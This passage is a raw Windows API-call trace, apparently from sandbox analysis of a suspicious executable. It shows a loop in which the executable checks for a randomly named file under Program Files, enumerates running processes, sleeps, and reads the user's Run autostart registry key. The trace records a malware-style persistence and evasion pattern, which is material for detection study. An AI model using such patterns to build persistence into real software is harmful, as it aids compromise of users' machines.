ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.221] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.221] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.221] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.221] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.221] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.222] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.224] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.225] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.244] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.244] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.244] NtClose (Handle=0x14c) returned 0x0 [0176.244] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.244] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.244] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.244] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.244] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.245] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.245] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.248] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.262] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.262] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.262] NtClose (Handle=0x14c) returned 0x0 [0176.262] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.262] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.262] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.262] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.262] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.262] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.263] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.267] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.281] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.281] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.281] NtClose (Handle=0x14c) returned 0x0 [0176.281] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.281] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.281] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.282] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.282] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.282] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.282] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.283] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.286] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.286] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.300] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.300] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.300] NtClose (Handle=0x14c) returned 0x0 [0176.300] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.300] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.301] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.301] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.301] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.301] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.302] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.302] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.305] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.312] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.312] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.312] NtClose (Handle=0x14c) returned 0x0 [0176.312] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.312] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.312] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.312] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.312] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.312] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0176.315] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0176.316] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0176.328] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0176.328] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0176.328] NtClose (Handle=0x14c) returned 0x0 [0176.328] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.328] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.328] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.328] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.328] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.328] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0176.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0176.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0176.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0176.330] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0176.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, 